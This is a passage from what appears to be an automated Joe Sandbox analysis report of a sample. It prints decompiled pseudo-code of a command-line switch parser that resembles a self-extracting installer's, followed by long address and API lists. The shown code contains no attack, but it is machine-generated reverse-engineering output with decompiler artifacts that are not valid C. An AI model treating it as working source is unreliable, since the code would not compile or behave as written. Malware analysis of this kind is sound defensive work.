                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2979337801-0
                                                                                                                                                                                                                                                • Opcode ID: bfd54c1cee485fa80659a176c49ee967936bedff14e6bb384563428cf1f2ed12
                                                                                                                                                                                                                                                • Instruction ID: e5d97c236f7f6c29249ef74c3b5a17a5e9d115ac68f7e8bd722e4d41f80669b7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfd54c1cee485fa80659a176c49ee967936bedff14e6bb384563428cf1f2ed12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98B0123100020CB7CF001B42EC088453F1DDBC02607400010F54C41421CB7398518585
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 00105C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMONCrypto
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E00105C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00106CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00106E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x108004; // 0xb5a2e1bc
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0010597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E001044B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x109124 = E00106285();
									_t75 = 0;
								}
								return E00106CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E001044B9(0, 0x521, 0x101140, 0, 0x40, 0);
												_t85 =  *0x108588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0010667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0010667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00105C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00101680(0x108c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0010667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0010667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x108a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00105C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x108b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x108a3a;
																}
																E00101680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0010658A(_t218, 0x104, 0x101140);
																if(E001031E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x108a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x108a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x108a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x108a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x108a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x109a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x109a2c =  *0x109a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x108d48 =  *0x108d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x109a2c =  *0x109a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x109a2c =  *0x109a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x108d48 =  *0x108d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x109a2c =  *0x109a2c | 0x00000004;
																										L70:
																										 *0x108a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x109a2c = 3;
																	 *0x108a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x108a2c != 0 &&  *0x108b3e == 0) {
						if(GetModuleFileNameA( *0x109a3c, 0x108b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E001066C8(0x108b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}


































































                                                                                                                                                                                                                                                0x00105c9e
                                                                                                                                                                                                                                                0x00105ca9
                                                                                                                                                                                                                                                0x00105cb0
                                                                                                                                                                                                                                                0x00105cb3
                                                                                                                                                                                                                                                0x00105cb6
                                                                                                                                                                                                                                                0x00105cb7
                                                                                                                                                                                                                                                0x00105cb8
                                                                                                                                                                                                                                                0x00105cbd
                                                                                                                                                                                                                                                0x00106204
                                                                                                                                                                                                                                                0x00105ccb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105ccb
                                                                                                                                                                                                                                                0x00105cd3
                                                                                                                                                                                                                                                0x00105cd7
                                                                                                                                                                                                                                                0x00105cf4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105cf4
                                                                                                                                                                                                                                                0x00105cf8
                                                                                                                                                                                                                                                0x00105d00
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d06
                                                                                                                                                                                                                                                0x00105d06
                                                                                                                                                                                                                                                0x00105d0e
                                                                                                                                                                                                                                                0x00105d10
                                                                                                                                                                                                                                                0x00105d12
                                                                                                                                                                                                                                                0x00105d14
                                                                                                                                                                                                                                                0x00105d15
                                                                                                                                                                                                                                                0x00105d17
                                                                                                                                                                                                                                                0x00105d49
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d19
                                                                                                                                                                                                                                                0x00105d19
                                                                                                                                                                                                                                                0x00105d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d3f
                                                                                                                                                                                                                                                0x00105d3f
                                                                                                                                                                                                                                                0x00105d4b
                                                                                                                                                                                                                                                0x00105d4b
                                                                                                                                                                                                                                                0x00105d4f
                                                                                                                                                                                                                                                0x00105d8d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d93
                                                                                                                                                                                                                                                0x00105d93
                                                                                                                                                                                                                                                0x00105d9a
                                                                                                                                                                                                                                                0x00105d9d
                                                                                                                                                                                                                                                0x00105d9e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d9e
                                                                                                                                                                                                                                                0x00105d51
                                                                                                                                                                                                                                                0x00105d5b
                                                                                                                                                                                                                                                0x00105d72
                                                                                                                                                                                                                                                0x001060fb
                                                                                                                                                                                                                                                0x001060fb
                                                                                                                                                                                                                                                0x00106207
                                                                                                                                                                                                                                                0x0010620a
                                                                                                                                                                                                                                                0x0010620b
                                                                                                                                                                                                                                                0x0010620e
                                                                                                                                                                                                                                                0x00106217
                                                                                                                                                                                                                                                0x00105d78
                                                                                                                                                                                                                                                0x00105d78
                                                                                                                                                                                                                                                0x00105d80
                                                                                                                                                                                                                                                0x00105d83
                                                                                                                                                                                                                                                0x00105d84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d84
                                                                                                                                                                                                                                                0x00105d5d
                                                                                                                                                                                                                                                0x00105d5f
                                                                                                                                                                                                                                                0x00105d62
                                                                                                                                                                                                                                                0x00105d68
                                                                                                                                                                                                                                                0x00105d64
                                                                                                                                                                                                                                                0x00105d64
                                                                                                                                                                                                                                                0x00105d64
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d62
                                                                                                                                                                                                                                                0x00105d5b
                                                                                                                                                                                                                                                0x00105d4f
                                                                                                                                                                                                                                                0x00105d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d9f
                                                                                                                                                                                                                                                0x00105d9f
                                                                                                                                                                                                                                                0x00105da5
                                                                                                                                                                                                                                                0x00105dab
                                                                                                                                                                                                                                                0x00105dba
                                                                                                                                                                                                                                                0x00106218
                                                                                                                                                                                                                                                0x0010621d
                                                                                                                                                                                                                                                0x00106220
                                                                                                                                                                                                                                                0x00106221
                                                                                                                                                                                                                                                0x00106229
                                                                                                                                                                                                                                                0x00106230
                                                                                                                                                                                                                                                0x00106247
                                                                                                                                                                                                                                                0x0010626a
                                                                                                                                                                                                                                                0x00106272
                                                                                                                                                                                                                                                0x00106249
                                                                                                                                                                                                                                                0x00106255
                                                                                                                                                                                                                                                0x0010625f
                                                                                                                                                                                                                                                0x00106264
                                                                                                                                                                                                                                                0x00106264
                                                                                                                                                                                                                                                0x00106284
                                                                                                                                                                                                                                                0x00105dc0
                                                                                                                                                                                                                                                0x00105dc0
                                                                                                                                                                                                                                                0x00105dca
                                                                                                                                                                                                                                                0x00105e22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105dcc
                                                                                                                                                                                                                                                0x00105dce
                                                                                                                                                                                                                                                0x00105e24
                                                                                                                                                                                                                                                0x00105e24
                                                                                                                                                                                                                                                0x00105e2c
                                                                                                                                                                                                                                                0x00105e47
                                                                                                                                                                                                                                                0x00105e4a
                                                                                                                                                                                                                                                0x001061d2
                                                                                                                                                                                                                                                0x001061e2
                                                                                                                                                                                                                                                0x001061e7
                                                                                                                                                                                                                                                0x001061ee
                                                                                                                                                                                                                                                0x001061f1
                                                                                                                                                                                                                                                0x001061f1
                                                                                                                                                                                                                                                0x001061f8
                                                                                                                                                                                                                                                0x001061f8
                                                                                                                                                                                                                                                0x00105e50
                                                                                                                                                                                                                                                0x00105e53
                                                                                                                                                                                                                                                0x00106109
                                                                                                                                                                                                                                                0x0010611f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106125
                                                                                                                                                                                                                                                0x00106137
                                                                                                                                                                                                                                                0x0010613a
                                                                                                                                                                                                                                                0x0010613c
                                                                                                                                                                                                                                                0x0010613e
                                                                                                                                                                                                                                                0x0010613e
                                                                                                                                                                                                                                                0x00106141
                                                                                                                                                                                                                                                0x00106141
                                                                                                                                                                                                                                                0x00106143
                                                                                                                                                                                                                                                0x00106144
                                                                                                                                                                                                                                                0x0010614a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106150
                                                                                                                                                                                                                                                0x00106152
                                                                                                                                                                                                                                                0x0010615c
                                                                                                                                                                                                                                                0x00106170
                                                                                                                                                                                                                                                0x00106172
                                                                                                                                                                                                                                                0x0010617c
                                                                                                                                                                                                                                                0x00106190
                                                                                                                                                                                                                                                0x00106190
                                                                                                                                                                                                                                                0x00106196
                                                                                                                                                                                                                                                0x001061a5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001061ab
                                                                                                                                                                                                                                                0x001061b9
                                                                                                                                                                                                                                                0x001061c6
                                                                                                                                                                                                                                                0x001061c6
                                                                                                                                                                                                                                                0x0010617e
                                                                                                                                                                                                                                                0x00106180
                                                                                                                                                                                                                                                0x0010618a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010618a
                                                                                                                                                                                                                                                0x0010615e
                                                                                                                                                                                                                                                0x00106160
                                                                                                                                                                                                                                                0x0010616a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010616a
                                                                                                                                                                                                                                                0x0010615c
                                                                                                                                                                                                                                                0x0010614a
                                                                                                                                                                                                                                                0x0010610b
                                                                                                                                                                                                                                                0x0010610e
                                                                                                                                                                                                                                                0x0010610e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e59
                                                                                                                                                                                                                                                0x00105e59
                                                                                                                                                                                                                                                0x00105e5c
                                                                                                                                                                                                                                                0x0010604f
                                                                                                                                                                                                                                                0x00106056
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010605c
                                                                                                                                                                                                                                                0x0010606e
                                                                                                                                                                                                                                                0x00106071
                                                                                                                                                                                                                                                0x00106073
                                                                                                                                                                                                                                                0x00106075
                                                                                                                                                                                                                                                0x00106075
                                                                                                                                                                                                                                                0x00106078
                                                                                                                                                                                                                                                0x00106078
                                                                                                                                                                                                                                                0x0010607a
                                                                                                                                                                                                                                                0x0010607b
                                                                                                                                                                                                                                                0x00106081
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106087
                                                                                                                                                                                                                                                0x00106087
                                                                                                                                                                                                                                                0x0010608d
                                                                                                                                                                                                                                                0x0010609c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001060a2
                                                                                                                                                                                                                                                0x001060aa
                                                                                                                                                                                                                                                0x001060b2
                                                                                                                                                                                                                                                0x001060b7
                                                                                                                                                                                                                                                0x001060bd
                                                                                                                                                                                                                                                0x001060bf
                                                                                                                                                                                                                                                0x001060bf
                                                                                                                                                                                                                                                0x001060d6
                                                                                                                                                                                                                                                0x001060e0
                                                                                                                                                                                                                                                0x001060e7
                                                                                                                                                                                                                                                0x001060f5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001060f5
                                                                                                                                                                                                                                                0x0010609c
                                                                                                                                                                                                                                                0x00106081
                                                                                                                                                                                                                                                0x00105e62
                                                                                                                                                                                                                                                0x00105e62
                                                                                                                                                                                                                                                0x00105e65
                                                                                                                                                                                                                                                0x00105fd3
                                                                                                                                                                                                                                                0x00105fe9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105fef
                                                                                                                                                                                                                                                0x00105fef
                                                                                                                                                                                                                                                0x00105ff7
                                                                                                                                                                                                                                                0x00105ffd
                                                                                                                                                                                                                                                0x00106003
                                                                                                                                                                                                                                                0x00106006
                                                                                                                                                                                                                                                0x00106011
                                                                                                                                                                                                                                                0x00106014
                                                                                                                                                                                                                                                0x0010603d
                                                                                                                                                                                                                                                0x00106016
                                                                                                                                                                                                                                                0x00106018
                                                                                                                                                                                                                                                0x00106019
                                                                                                                                                                                                                                                0x0010601b
                                                                                                                                                                                                                                                0x00106033
                                                                                                                                                                                                                                                0x0010601d
                                                                                                                                                                                                                                                0x00106020
                                                                                                                                                                                                                                                0x00106029
                                                                                                                                                                                                                                                0x00106022
                                                                                                                                                                                                                                                0x00106022
                                                                                                                                                                                                                                                0x00106022
                                                                                                                                                                                                                                                0x00106020
                                                                                                                                                                                                                                                0x0010601b
                                                                                                                                                                                                                                                0x00106042
                                                                                                                                                                                                                                                0x00106044
                                                                                                                                                                                                                                                0x00106046
                                                                                                                                                                                                                                                0x0010604a
                                                                                                                                                                                                                                                0x00105ff7
                                                                                                                                                                                                                                                0x00105fd5
                                                                                                                                                                                                                                                0x00105fd8
                                                                                                                                                                                                                                                0x00105fd8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e6b
                                                                                                                                                                                                                                                0x00105e6b
                                                                                                                                                                                                                                                0x00105e6e
                                                                                                                                                                                                                                                0x00105f8b
                                                                                                                                                                                                                                                0x00105f99
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105f9f
                                                                                                                                                                                                                                                0x00105fa7
                                                                                                                                                                                                                                                0x00105faf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105fb1
                                                                                                                                                                                                                                                0x00105fb3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105fb5
                                                                                                                                                                                                                                                0x00105fb7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105fb9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105fb9
                                                                                                                                                                                                                                                0x00105fb7
                                                                                                                                                                                                                                                0x00105fb3
                                                                                                                                                                                                                                                0x00105faf
                                                                                                                                                                                                                                                0x00105f8d
                                                                                                                                                                                                                                                0x00105f8d
                                                                                                                                                                                                                                                0x00105f8d
                                                                                                                                                                                                                                                0x00105f8f
                                                                                                                                                                                                                                                0x00105fc1
                                                                                                                                                                                                                                                0x00105fc1
                                                                                                                                                                                                                                                0x00105fc1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e74
                                                                                                                                                                                                                                                0x00105e74
                                                                                                                                                                                                                                                0x00105e77
                                                                                                                                                                                                                                                0x00105ea0
                                                                                                                                                                                                                                                0x00105ebd
                                                                                                                                                                                                                                                0x00105f79
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105f7f
                                                                                                                                                                                                                                                0x00105ec3
                                                                                                                                                                                                                                                0x00105ec3
                                                                                                                                                                                                                                                0x00105ecc
                                                                                                                                                                                                                                                0x00105ed4
                                                                                                                                                                                                                                                0x00105ed6
                                                                                                                                                                                                                                                0x00105edc
                                                                                                                                                                                                                                                0x00105edf
                                                                                                                                                                                                                                                0x00105eea
                                                                                                                                                                                                                                                0x00105eed
                                                                                                                                                                                                                                                0x00105f3f
                                                                                                                                                                                                                                                0x00105f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105eef
                                                                                                                                                                                                                                                0x00105eef
                                                                                                                                                                                                                                                0x00105ef2
                                                                                                                                                                                                                                                0x00105f34
                                                                                                                                                                                                                                                0x00105ef4
                                                                                                                                                                                                                                                0x00105ef4
                                                                                                                                                                                                                                                0x00105ef7
                                                                                                                                                                                                                                                0x00105f2b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105ef9
                                                                                                                                                                                                                                                0x00105ef9
                                                                                                                                                                                                                                                0x00105efc
                                                                                                                                                                                                                                                0x00105f22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105efe
                                                                                                                                                                                                                                                0x00105eff
                                                                                                                                                                                                                                                0x00105f02
                                                                                                                                                                                                                                                0x00105f16
                                                                                                                                                                                                                                                0x00105f04
                                                                                                                                                                                                                                                0x00105f07
                                                                                                                                                                                                                                                0x00105f0d
                                                                                                                                                                                                                                                0x00105f46
                                                                                                                                                                                                                                                0x00105f46
                                                                                                                                                                                                                                                0x00105f09
                                                                                                                                                                                                                                                0x00105f09
                                                                                                                                                                                                                                                0x00105f09
                                                                                                                                                                                                                                                0x00105f07
                                                                                                                                                                                                                                                0x00105f02
                                                                                                                                                                                                                                                0x00105efc
                                                                                                                                                                                                                                                0x00105ef7
                                                                                                                                                                                                                                                0x00105ef2
                                                                                                                                                                                                                                                0x00105f4c
                                                                                                                                                                                                                                                0x00105f4e
                                                                                                                                                                                                                                                0x00105f50
                                                                                                                                                                                                                                                0x00105f54
                                                                                                                                                                                                                                                0x00105ed4
                                                                                                                                                                                                                                                0x00105ea2
                                                                                                                                                                                                                                                0x00105ea4
                                                                                                                                                                                                                                                0x00105eaf
                                                                                                                                                                                                                                                0x00105eaf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e79
                                                                                                                                                                                                                                                0x00105e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e83
                                                                                                                                                                                                                                                0x00105e83
                                                                                                                                                                                                                                                0x00105e83
                                                                                                                                                                                                                                                0x00105e85
                                                                                                                                                                                                                                                0x00105e85
                                                                                                                                                                                                                                                0x00105e8e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105e94
                                                                                                                                                                                                                                                0x00105e8e
                                                                                                                                                                                                                                                0x00105e7d
                                                                                                                                                                                                                                                0x00105e77
                                                                                                                                                                                                                                                0x00105e6e
                                                                                                                                                                                                                                                0x00105e65
                                                                                                                                                                                                                                                0x00105e5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105dd0
                                                                                                                                                                                                                                                0x00105dd0
                                                                                                                                                                                                                                                0x00105dd0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105dd0
                                                                                                                                                                                                                                                0x00105dce
                                                                                                                                                                                                                                                0x00105dca
                                                                                                                                                                                                                                                0x00105dba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105d00
                                                                                                                                                                                                                                                0x00105dd9
                                                                                                                                                                                                                                                0x00105e04
                                                                                                                                                                                                                                                0x001061fe
                                                                                                                                                                                                                                                0x00105e0a
                                                                                                                                                                                                                                                0x00105e0c
                                                                                                                                                                                                                                                0x00105e17
                                                                                                                                                                                                                                                0x00105e17
                                                                                                                                                                                                                                                0x00105e04
                                                                                                                                                                                                                                                0x00106200
                                                                                                                                                                                                                                                0x00106200
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharNextA.USER32(?,00000000,?,?), ref: 00105CEE
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00108B3E,00000104,00000000,?,?), ref: 00105DFC
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00105E3E
                                                                                                                                                                                                                                                • CharUpperA.USER32(-00000052), ref: 00105EE1
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00105F6F
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00105FA7
                                                                                                                                                                                                                                                • CharUpperA.USER32(-0000004E), ref: 00106008
